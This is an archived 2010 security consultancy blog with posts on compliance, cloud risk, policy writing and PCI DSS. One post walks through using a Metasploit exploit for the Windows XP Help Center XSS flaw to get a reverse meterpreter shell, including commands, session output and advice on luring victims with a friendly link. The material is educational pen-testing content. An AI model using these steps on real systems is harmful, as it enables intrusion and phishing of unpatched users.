As you move through the standard or regulation identifying where documentation is necessary, keep a list of what policies address which sections. At the conclusion of the gap assessment of the applicable regulations and compliances, you will have a firm understanding of what policies and related documentation are necessary. Keep in mind that in addition, it is important to review contractual obligations. These contractual obligations generally exist between you and your clients, vendors, and other service providers. Involving your legal department is always recommended.

In the next part of this series we will cover some of the pitfalls to avoid.

Read more!

Monday, August 9, 2010

A Week of Security in Vegas: Black Hat, Bsides, & Defcon

Towards the end of summer each year the information security world descends on Las Vegas for a week of training, discussion and the disclosure of a year’s worth of quiet research. I’ve been attending off and on for years, and was joined this year by several of my new SecureState co-workers from Profiling and Risk Management.

The week started off with the biggest, and most expensive of the 3 events: Black Hat Las Vegas. This is the original and largest of the Black Hat events held around the world each year, and it has often been a forum for disclosing some of the most cutting-edge and impactful research within Information Security. The biggest talk this year hands down was Barnaby Jack’s presentation on compromising Automatic Teller Machines. Barnaby had attempted to give a similar presentation in 2009, but his employer pulled the presentation after pressure was applied from some unnamed ATM manufacturers. After changing employers and adding several new ATM machines to his collection, Barnaby was back this year to give a live demo of local and remote compromise of two different ATMs.

Read more!

Thursday, August 5, 2010

Moving To The Cloud Primer

Everywhere you look, there are articles, research and analysis on the topic of cloud computing. It has even been termed, “the most significant shift in information technology in our lifetimes.” The positive aspects are exciting and offer many benefits, including access to applications, storage for legacy data, and powerful computer processing -all with the click of a mouse. For companies that want to avoid purchasing entire systems of IT software and hiring the talent to operate and secure them, this option may seem very tempting. One common concern that should be analyzed and researched thoroughly is the issue of security in cloud computing. Any future cloud user should gather as much information as possible about their potential cloud provider before sending any data to the cloud.

For instance, it would be wise to ask any potential cloud provider how they protect against malicious insider activity. One question that should be submitted is if a provider conducts background checks on all relevant employees. Nothing like sending PII to a cloud provider that lacks knowledge on who is working for them. Additionally, questions on employee monitoring, access determination, and audit trails would also be appropriate. Some providers may not want to divulge such technical information. If the cloud provider does not want to provide such information, ask if they have any monitoring and access control policies and procedures in place. If they don’t, tell them to create some and make it part of the service contract. One way or another, you’re going to want to be protected.

For those cloud providers that are providing Software as a Service where all development is handled on the provider side, questions on the system development lifecycle would apply. For example, customers will want to know if the cloud provider has incorporated security into their SDLC. Also, see if the future cloud provider takes into consideration the OWASP Cloud Top 10 during the development cycle. Lastly, ask the provider if they follow Cloud Security Alliance guidance for critical focus areas. If the cloud provider answers in the negative or has no idea what you’re talking about, it may be best to look for another provider.

As touched on above, some cloud computing companies practice the “security by obscurity” method, which will usually exacerbate the fears of the company seeking cloud services. It is a fine line to walk, because the cloud computing company does not want to divulge too much information, which could compromise their security from malicious attackers. However they should want to be as transparent as possible to their potential clients. Try to find a cloud computing company that offers voluntary monthly or quarterly security reports. This report will show the client what issues the company is addressing, without broadcasting information that compromises their security posture.

What other types of data are being stored by the cloud provider? Do they allow data that may be malicious code, spamming data or information related to criminal activity? In multi-tenant environments “Innocent” data can be located on the same shared infrastructure as “Malicious” data. This should be investigated thoroughly before choosing a cloud provider. Specific questions about strict registration and validation processes and ongoing monitoring of network traffic before, after and during storage and use should be the norm. Besides, if the provider accepts unscrupulous clients and the provider’s defense in depth as well as compartmentalization is weak, what’s to stop a malicious tenant from accessing your data?

Before utilizing any cloud services, customers should conduct an internal assessment for any regulatory compliance complications. Many regulations demand that certain classes of data not be intermingled with other, less sensitive data, such as on multi-tenant shared servers or databases. Additionally, data retention laws vary among countries, with data limits on what can be stored, and for how long being heavily regulated in some countries. Some countries even make it unlawful for some data to be transferred to foreign cloud providers. When the data is no longer needed, most retention laws will require the cloud provider to wipe the data clean before being sent to the pool. Can your cloud provider provide this service? Also, many regulations or standards require some sort of logging as well as log reviewing to be conducted in order to be compliant (PCI Anybody). However, most cloud provider logs are internal and access to these logs by customers or auditors may be difficult. As a result, this type of scenario would make complying with such regulation or standard nearly impossible. Consequently, a compliance impact assessment should be carried out before moving to the cloud.

In conclusion, there are many concerns that companies must consider before utilizing the Cloud. The concerns highlighted in this blog post are only the tip of the iceberg. Therefore, a proper assessment of any cloud provider is warranted for any organization planning a move to the cloud.

Read more!

Tuesday, August 3, 2010

Information Security Policies and Procedures, Part 1

Note: This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 2 , Part 3 , Part 4 , Part 5 , Part 6

Policy writing can be a daunting task, and one for which many are not overly enthused. However, Policies and Procedures are an integral part of any information security program. Not only do they provide direction and accountability, many specific policy elements are a requirement of specific laws, regulations, and/or standards. In this multipart series, I will work to help you become comfortable writing policies and their associated procedures.

Before we get started, there are a few things that are important to know.

Policy sets are different in each environment. With information security, the number of policies as well as the breadth of each policy will vary depending on the complexity of the environment as well as the sensitivity and criticality of the information. There are other factors that will affect information security policy development as well. For example, it is common that some of the elements of an Acceptable Use Policy will already be covered in basic HR policies and employee handbooks. It is essential that different departments work together to ensure that policies work in concert and do not contradict each other.

It is also essential to determine the audience for any given policy. For most users, the Acceptable Use Policy will determine the rules for their access. Network Security Policies, Access Control Policies, and System Access Logging and Maintenance Policies will have IT departments as their audience. It is also important to note that certain policies may be confidential according to an asset classification program. A Network Security Policy delineating requirements for protections such as connection restrictions or intrusion protection and detection may be valuable for an attacker. It is vital to consider business need to know when distributing policies.

The Differences Between Policies, Procedures, and Standards

It is important to understand the differences between a policy, procedure, and standard, and the functions of each. Policies delineate the laws for an organization. Procedures and standards describe how to implement policies. A simple analogy is that of a red light. The policy, or law, requires that drivers come to a complete stop at any and all red lights. The procedure, however, will describe how to depress the brake, operate the clutch, etc. The standard would describe what types of brakes and tires are appropriate. An exception process would describe the circumstances under which the policy may be violated--in this example, an emergency vehicle.

In the next part of this series, we will discuss how to determine which policies are necessary for your environment.

Part 2 , Part 3 , Part 4

Read more!

Monday, August 2, 2010

Vulnerability Assessments are not Penetration Tests!

Too often I, as well as many of my co-workers, go into a client and throughout whatever assessment I am working on, general questions come up like, “when’s the last time you’ve had a pen test?” And the client responds, “Ohhh, we do those annually with ‘Some Corporation.’ ” And after looking at ‘Some Corporation’s’ website and seeing what they consider to be a penetration test, I am again disgusted to see that they show up with a vulnerability scanner, run it, validate some findings, and are off to their next client.

Now I know these are some brash comments made toward some random security companies, but let’s be honest here: If you’re going to do something, do it right the first time and provide your client the value of the assessment they paid for. Additionally, give the client what they paid for. If I go to a salesman to buy a sports car and he tries to sell me a Honda Civic, I’m going somewhere else to get what I asked for. On the other side of the coin is the fact that a lot of companies that want a penetration test don’t really understand what it is to begin with. It seems to me that gone are the days of true pen testing when the dreaded “Red Team” shows up to strike real fear into the hearts and minds of Security Practitioners at Fortune 1000 companies.

Any kid in their parent’s basement with savvy computer skills can fire up a Nessus scanner, Web Application Scanners, or Qualys Guard against a network and some of those people can actually interpret the results to make sense out of them. Trust me, everyone on SecureState’s Profiling Team can do that with their eyes closed, but how many security companies out there can actually run a legitimate pen test? I’m not calling anyone out and challenging them, but in all reality, I just want to know how many companies are willing to admit that what they call a “Penetration Test” is actually just a vulnerability assessment? Even worse is the number of companies who perform so called “penetration tests” and truly believe that a vulnerability assessment is the same thing as a pen test.

So let’s all be clear here: a true penetration test is over 85 percent manual and the remaining 15 percent can be a vulnerability scanner to get some other findings in a report in order to provide additional value to the client. And let’s also define manual attacks as to not be ruling out all tools. Using a port scanner is way different than using nCircle, Qualys, or Nessus. Automated scanners like these are the tools that don’t really help a pen test. And just because you use a tool like the Metasploit Framework and many of the tools in Back|Track 4, doesn’t mean you are running a vulnerability scanner. NMAP has the ability to run scripts as well, but again, it doesn’t belong in the Vulnerability Scanner category.

Many times, companies perform Attack and Penetration's due to compliance, or potentially other reasons, which is a bad idea. It gives those companies the opportunity to choose malicious compliance over the desire for truly assessing the security of the entire company. Malicious compliance is a term used when companies do the bare minimum in order to achieve a stamp of approval for whatever standards they are trying to satisfy the needs of. When companies choose to perform pen tests on only their systems affected by compliance, such as PCI or HIPAA systems, they are missing entire networks of systems which aren’t tested. When this happens, companies aren’t getting the true value of what a Pen Test can provide.

SecureState is a trend setting company, and this is where we are going to step in and say, “We Pen Test!” The PCI DSS Council has at least defined what they consider a penetration test. In section 11.3 the Council defines it to be: “vulnerability assessment simply identifies and reports noted vulnerabilities, whereas a penetration test attempts to exploit the vulnerabilities to determine whether unauthorized access or other malicious activity is possible.” Even the EC Council states that, “Penetration testing simulates methods that intruders use to gain unauthorized access to an organization’s networked systems and then compromise them. Penetration testers may use proprietary and/or open source tools to test known technical vulnerabilities in networked systems. Apart from automated techniques, penetration testing involves manual techniques for conducting targeted testing on specific systems to ensure that there are no security flaws that may have gone undetected earlier.”

The SecureState Profiling Team utilizes lower risk vulnerabilities in some systems with additional vulnerabilities in other systems and links them together into larger attacks. By pulling off an attack in this fashion, the Profiling Team utilizes what is called the Vulnerability Linkage Theory in which we can show why it's important to maintain system baselines and other security measures. The Vulnerability Linkage Theory shows how the attack was pulled off by coupling vulnerabilities in many systems to result in the end compromise. For instance, username enumeration from a website, coupled with a brute force attack on the mail system, could allow SecureState to access mail from a company. From here we can email the tech support team and social engineer them into divulging information on how to access the corporate VPN and voila: access to the internal corporate network. There is no way a vulnerability scanner can do that.

Penetration tests zero in to specific systems in order to break in and see what information can be divulged. Pilfering computers and file shares will explain the benefits of Pen Tests by finding the important documents and unencrypted data. Even finding password protected Microsoft Office files can be cracked to release potentially serious data about a company we’re hacking into. Pen Tests can also be used by Security Departments to show why things need to be fixed and get budget to move forward.

There are conflicting views on Pen Tests and Vulnerability Scans. Pen Tests aren’t performed to find vulnerabilities; they are done in order to compromise systems and networks. The main difference between the two is that in a pen test the attackers are actually exploiting vulnerabilities in systems, adding user accounts, and compromising machines across the network. A full or total compromise, which means total control over the entire network, is the end goal of a pen test. Throughout a pen test, the attackers will inevitably generate a list of findings. Many of these findings may be the same as what a vulnerability assessment will also come up with, but there are many vulnerabilities that scanners just can’t find, which leads to the fact that tools can’t think; consultants can. Consultants are able to interpret results and decide on how to use them in order to leverage certain attack vectors against machines and networks.

Don’t get me wrong: I am not discounting the need, want, or value of a vulnerability assessment. These assessments, as well as pen tests, have their place and need. What I am saying is that these assessments need to be better understood in order to know how and when they should be performed. Additionally, there have been companies that run regular vulnerability assessments and the same vulnerabilities keep coming up every single scan. These companies are either overwhelmed with the amount of vulnerabilities present in their networks and don’t know how to fix them, or they don’t see the value or need in fixing them. Penetration tests can enforce the reasoning. In turn, by better understanding what the difference is, the clients will understand what to expect as a final product and won’t be dissatisfied with the results of each test.

Read more!

Friday, July 23, 2010


I was recently interviewed on News Channel 5 about Tabnabbing which is a new technique that can be used for phishing. Tabnabbing is where one of your browser tabs changes, usually without your knowledge, to an attacker controlled website. Usually the website changes to something that looks familiar to the victim like Gmail, Facebook or Twitter. This can usually trick the victim to think that they have been logged out of a website. If the victim enters their credentials into the phishing site they are sent to the attacker. The credentials are then harvested and the victim is forwarded to the legitimate web site.

Check out the video and article over at

Read more!

Thursday, July 22, 2010

Be An Information Security Green Beret

Not so long ago while flipping through channels on the TV I happened upon a documentary of the United States Army’s Special Forces, also known as the “Green Berets.” Never having served myself, my perception of this group was always based more on movies like “Rambo” where the Green Beret is an unstoppable one-man army who takes on the bad guys singlehandedly. In the real world, of course, this turns out not to be the case.

The Green Berets have many different groups and many different missions. And while like Rambo they are expected to have exceptional and specialized combat skills, what was fascinating to me was the focus on “soft skills.” One of their missions is to build insurgent and counter-insurgent groups from whatever groups of people they have available. They need to be able to communicate with natives of foreign countries, train them in the use of weapons and tactics, and lead them into battle. A single 12-man “A-Team” is expected to be capable of building and leading a 200 member guerrilla force! Within the military this is called a “Force Multiplier” and it’s a very powerful concept.

Read more!

Thursday, July 15, 2010

Getting Things Done: Stop Debating Security Minutiae

Many are familiar with David Allen's "Getting Things Done" methodology, used for time management to increase productivity and focus. Do you use it? Ask yourself, "What is the next physical action required to move this project forward?" Repeat this process until everything in the world is finished. It's just that simple.

What are minutiae? Minor details. More importantly, minutiae are minor details of negligible importance.

Negligible importance? Yes, negligible. Meaning, when you're studying something of larger magnitude, the items of negligible importance can be ignored or neglected. That's right, move on, you've got bigger fish to fry.

• We've got to look at better anti-virus software because our current one is not detecting malware X!
• We can't force our clients to change their passwords to our external portal! We'll have an uprising and get a ton of calls!
• Writing policy is a waste of time because employees won't follow the rules!
• Risk management has no place here because we don't even have time to patch all of our systems!
• Don't bring up PCI compliance around the CFO, he won't care.

We love to debate minutiae everywhere, in all facets of life. Information security is no different; it's a beloved exercise because it absolves us from actually having to do anything. And it makes us feel good! It makes us feel satisfied (mmm, tasty tasty minutiae)! But really all we've done is spun our wheels, and failed to persuade or change people’s minds.

Debating minutiae is crippling for a security program. It stunts growth and maturity. When using minutiae to build a security program, it's paralyzing. An organization will lay band-aids on everything that's in front of them; they'll focus only on the trees instead of the forest. They'll only discuss what's comfortable, or what's within their wheelhouse.

Now, move away from your keyboard, settle down, and retract your claws, Mr. Devils-In-The-Details. A wise older man with a tablet recently told me, “One man’s minutiae is another man’s job description.” I'm not saying you should ignore specificity to the point of ambiguousness. You absolutely need details. But really, you need them only at specific times. More often than not, they confuse and delay. They take the focus off of root, systemic issues - that feels good to everyone involved, because then they can talk about the things that are in front of them all day, the things they're experts in (read: comfortable). Do you work for a large organization? How many meetings were you in today that lasted more than an hour? Did you spend the majority of the time in your meetings talking about things that didn't really matter at that point? Most meetings include more trivial details than minor, important details.

You want to get things done? Start big, skim the surface across all areas, bring up uncomfortable security topics, continually assess, and then do something with that information - build a plan, and establish success and failure criteria on what it is you’re trying to get done so that you can clearly separate the minutiae from the bull’s-eye. Once you’ve got the bull’s-eye, create a timeline and go. Important details will flush themselves out. I promise. People who get things done realize this. Call us if you'd like to talk about it.

Read more!

Wednesday, July 7, 2010

Trust, But Verify: Full-Time Compliance

You can Google "trust, but verify" and come up with hundreds of articles regarding one of Ronald Reagan's signature catch phrases, accountability, auditing, etc. It can also be considered the default credo of the auditing community. Regardless of where it came from and the potential overuse of the phrase, it's what I live by and is a code that should be followed by anyone responsible for their company's compliance/governance programs and the security of sensitive data. Just about every regulation that deals with the protection of sensitive information requires some form of risk management and/or validation of controls. Proper compliance and risk management programs will not be successful without a high level of verification that proper security controls are in place and operating effectively.

Read more!

Tuesday, June 29, 2010

Acceptance is the first step

There’s a line. It’s an imaginary line, but it’s there and I’ve seen it manifest itself. It usually appears when an organization’s security division has to deliver a third party security assessment to their executive management. On one side of the line is the sincere quest for security improvement, on the other, internal politics and finger pointing. I have seen good people step right over that line in a well-intentioned act of self-preservation. When this happens, it can bring into question the role of the third party assessor.

Read more!

Thursday, June 24, 2010

The Case for Legal Defensibility

I came across an interesting read the other day when researching future data security laws and regulations. The article I came across, titled "The Legal Defensibility Era," discussed the legal defensibility doctrine and its application in the information security arena. The whole premise of legal defensibility is to look beyond the check-the-box compliance mentality and build an information security program based on a reasonable standard of care for a particular organization. One of the intended benefits of building a security program based on reasonability is to lower one's liability risk.

It is apparent in today's compliance atmosphere that most organizations will do only the minimum necessary as required by law or regulation to secure themselves. Worse yet, other organizations will fail to implement any information security program either because most laws and regulations don't apply to them or they decided to accept all risk and push their luck.

What exacerbates this already complex problem is the myriad of different laws and regulations facing each organization. With so many laws and regulations out in the wild, it's not surprising for information security departments to feel overwhelmed and create unplanned and improvised programs protecting only the proverbial "low hanging fruit." Furthermore, risk management, when conducted improperly, could share some of the blame for poor security practices. If a proper risk rating cannot be ascertained during the risk assessment, improper decision making such as risk acceptance that greatly raises risk appetite or mitigating a risk that should have been accepted can occur.

Now, I'm not saying risk management and the patchwork of laws and regulations have no place in legal defensibility, because they do. Risk management is a very important spoke in the legal defensibility wheel as it demonstrates one is acting reasonably when it comes to securing their information. Also, a law is a law; if you have to follow it, then you have to follow it. However, only following the minimum requirements of any law or regulation won't necessarily make your organization more secure. In fact, in may even give you a false sense of assurance.

What legal defensibility will provide in the above situations is a reasonable standard to maintain a defense to potential lawsuits or fines if there is a breach in their information security. For instance, an organization that follows only the "minimum necessary" mentality may realize after a proper legal defensibility assessment that their current state of security was not adequate and would not meet a "reasonable" standard. In this situation their entire information security program may be worthless if it cannot provide a shield for them in a legal or regulatory action.

For example, a certain regulation may have stipulated the implementation of only some type of access controls, but let's assume it would have been more reasonable to also implement some sort of encryption feature. Consequently, the legal system may carry an unfavorable opinion of your security program for not implementing an encryption solution should a breach occur and may even view your organization as being incompetent. This could result in higher liability expenses, fees, and fines. This is especially true if the law or regulation does not provide a safe harbor for meeting the minimum requirements.

Read more!

Thursday, June 17, 2010


Smartphones have become an integral part of our lives; we rely on them for everything. They hold all of our personal information, calendars, emails, phone numbers, text messages, and documents. However, the average user is not very savvy when it comes to the security of these devices. A user can browse to one of the many app stores and download just about anything, and most users do just that. One of the exciting things about smartphones is the customization of them. You can get any type of application you want, and most of the time it is free. You can get games, productivity applications, web servers, and ftp servers. Users feel a false sense of security because it is “just a phone” and the apps must be secure because they are getting them from an app store. These apps are developed by programmers of varying levels and skill sets, and security might not be their top priority. None of the app stores put the apps through a thorough security check; most run virus scans but it is usually done randomly and done after the app is posted. Even Apple has fallen victim to mobile malware. Some apps have even been signed safe by the stores only to have malicious code be discovered at a later date. Samsung’s Wave shipped with malware installed on the SD card, which activated as soon as it was connected to a PC.

Read more!

Monday, June 14, 2010

Windows XP Help Center Client Side Attack

With the patch Tuesday release of XP zero days last week i started checking around for Proof of concepts and ran across the following posts.

The above advisories are for windows XP which many businesses still run, and utilizes a XSS attack which many developers and site owners feel isn't really a threat, read below to find out why XSS is dangerous.

After reading the above advisories I checked in metasploit and a working exploit is already available within the exploit framework.

If you are on an internal or client side test penetration test you generally see most clients running windows XP and generally outdated browsers. They are either using IE6 or IE7 or IE8. The above advisories describe a way of using a cross site scripting attack to gain full control of the victim. The essence of this attack is that an un-handled XSS is utilized in hcp://system/sysinfo/sysinfomain.htm?svr=, which can be directly accessed via a url in a browser. By using a defer in a XSS to execute a script in a privileged zone a windows popup is bypassed thus not needing a victim to click any annoying popups to make the attack work.

<script defer>code</script>

"due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as '=' or '"' or others are specified. "

The help center exploit works on xp sp2 and sp3 which covers most clients in most companies. I do not see many companies running vista or windows7.... IE6 and IE7 browsers are vulnerable to this attack without a popup however IE8 works but with a user popup box unless the victim is running certain versions of media player... I also just tested this with a IE8 browser running in comparability mode... When the client visited the page Automatically the exploit pulled up the help docs and gave me a meterpreter shell, wooooot
I am thinking this would be a good exploit to use in client side penetration tests... So below is the info and a quick usage of the exploit...

Module Name:

Below is a description and then usage of the module... give it a try...

Description: (From Metasploit)
"Help and Support Center is the default application provided to
access online documentation for Microsoft Windows. Microsoft
supports accessing help documents directly via URLs by installing a
protocol handler for the scheme "hcp". Due to an error in validation
of input to hcp:// combined with a local cross site scripting
vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. On IE6 and IE7 on XP
SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should
continue. Automatic detection of these options is implemented in
this module, and will default to not sending the exploit for
IE8/WMP11 unless the option is overridden."

Simple Usage Example:
msf > use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.

Send Your Link to the Victim and wait:
Now send the victim out a link to your IP address via email or chat. Generally i would have a registered URL that looks friendly and send them that URL in order to not look too suspicious.

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > [*] Request for "/" does not contain a sub-directory, redirecting to /c3hfRM5Kh/ ...
[*] Sending Microsoft Help Center XSS and Command Execution to
[*] Responding to request for exploit iframe at
[*] Request for "/" does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ ...
[*] Responding to WebDAV OPTIONS request from
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending EXE multistatus for /Vl/ly.exe ...
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] GET for payload received.
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri Jun 11 18:10:38 -0400 2010

msf exploit(ms10_xxx_helpctr_xss_
cmd_exec) > sessions -l
Active sessions
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter EXPLOIT\Administrator @ EXPLOIT ->
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: EXPLOIT\Administrator

Final Notes:
With the coming of a new patch tuesday, a whole slew of exploits are available for windows XP. The moral of the story is, UPDATE YOUR SYSTEMS.The metasploit module above sets up a server and waits for your victim to make a connection, when the victim does make a connection a help window is opened and they are silently owned.... More then likely the victim will just think windows is acting up as windows usually does or perhaps the user accidentally clicked something :) :)

Read more!

Thursday, June 10, 2010

Upcoming PCI DSS Changes

It’s getting to be that time of year again; PCI ROC season is right around the corner. Though the new version of PCI DSS (Version 2.0?) is not due out until October, many of my clients are asking what changes they should expect.

Every two years the PCI Security Standards Council (PCI SSC) issues a new version of the Payment Card Industry Data Security Standard (PCI DSS) as part of the lifecycle and feedback review process from a wide range of organizations. No major changes are expected in the upcoming release, just clarifications.

For starters, look for an update to Requirement 6.5 (secure web application development) for changes in the OWASP Top 10. Your will see 2 new Top 10 vulnerabilities including Security Configuration and Unvalidated Redirects and Forwards. Gone are malicious file execution (6.5.3) and Information leakage and improper error handling (6.5.6). Keep in mind that (as per PCI DSS) whenever a new version of the OWASP Top 10 vulnerabilities is released, it’s implied that the current requirements are to be replaced with the latest OWASP updates.

Expect to see Information Supplements that provide guidance and clarification on a range of emerging technologies. One of the first will address the use of Virtualization technologies. The Virtualization Special Interest Group (SIG) has been busy putting together a white paper and a mapping "tool" document that explains where virtualization applies within each requirement of the DSS. You can find more information on the Virtualization SIG here. Other papers to be published are anticipated to address end-to-end encryption, tokenization and even the Eurocard-MasterCard-Visa (EMV) chip-card standard.

In another change, the PCI SSC is expected to clarify what constitutes acceptable network segmentation. Although segmenting cardholder data environments from the rest of non-cardholder data network is not required by the PCI DSS, it is the only cost effective way to address compliance. Without segmentation, your entire network is considered in scope and subject to PCI compliance.

Lastly, there should be clarification on strong one-way hashing of Primary Account Numbers (PAN). Organizations can remove PAN data from PCI scope either by truncation (deleting all but the first 6 and last 4 digits) or using a secure one-way hash that cannot be reversed. This clarification promises to be a welcome step in helping organizations and their QSAs clarify what is and what is not in scope.

Read more!

Friday, June 4, 2010

Why Can’t We All Just Get Along?

During a recent discussion at work, the benefits of a sound security program outside of the context of repelling malicious assaults came up. What would be the gain of a security program if there was no one attempting to break into a network? How would the role of security for Information Technology change? Would security careers come to a crashing halt?

To give the discussion a framework, the following parameters were agreed upon:

Suddenly everybody in the world is neither malicious nor unscrupulous.

While there is still competition in industry, it is driven only by the idea that each competitor in an industry will attempt to outperform their competition by creating better products at a lower cost, but there will be no espionage or market for trade secrets.

  1. Nobody is intentionally harming the network or systems, so there will be no worms, Trojans, or computer viruses.

  2. This is global, so as to remove the possibility of foreign attackers, military or otherwise.

  3. People would still be capable of errors and would have disagreements founded in misunderstanding, but these disagreements would be settled through mediation or court, or rock-paper-scissors.

We talked about this for a while, but had no way to quantify either side of the argument.

So in this world with “No bad guys, period.” what benefit would there be to a security program? What would be areas where things would remain the same? What would be able to be removed from a security program? What does this mean to how we look at security programs as they currently exist?

To make things simple I thought it would be easiest to measuring what percentages of change would occur in a recognized Information Security Management Standard, BS7799. This way I could determine what changes would occur to security programs more globally. By using a recognized standard I felt it would be more appropriate than what one company or another might find useful for their individualized needs.

The next step was to go through the standard and determine if its components would stay or go. To do this an audit checklist of the BS7799 by Val Thiagarajan, available through SANS, was used to concisely summarize the intent of the standard, as it’s directed questioning leads to each sections focus. The results, with the rationale used in determining each section decided fate, assuming this is a standards based program for a medium sized business, founded on the three principals of security; availability, integrity, and confidentiality, can be found here:

By tallying up the results, albeit subjectively, it was found that even without “bad guys”, 77.95 percent of the BS7799 is still applicable. This bodes well for justification of a security program, even in a world free of bad guys. Unsurprisingly, based on the outlined framework in which the subject was approached, for a medium business, the dramatic swing away from confidentiality towards integrity and availability maintained the need of a security program. Availability and integrity are key to processing orders, a major factor in most businesses. What was surprising was the extent to which the standard approached these two areas, given the amount of emphasis typically seen in security postings on mitigating against attackers. It crystallized further during this process how underrepresented the principles of availability and integrity are in most security conversations, given their weight. I hear a lot of “What will you do if this box gets compromised?” and very little “What is your plan if your RAID array gets corrupted?” at the speaking engagements I go to. Without paying attention to these core concepts the program can get very lopsided.

Hopefully this will help lend perspective to anyone that a hacker hasn’t yet breached that there is a need for a sound security program. Furthermore, this will hopefully guide people towards looking into their business continuity programs to revisit how impactful their systems can be on cash coming in to their businesses, and how important it is to develop a security program with processes in place to ensure access to and/or with the foresight to recover these systems.

Even without bad guys security would play a vital role for Information Technology, though it may change its name to “Continuity Planning”.

Read more!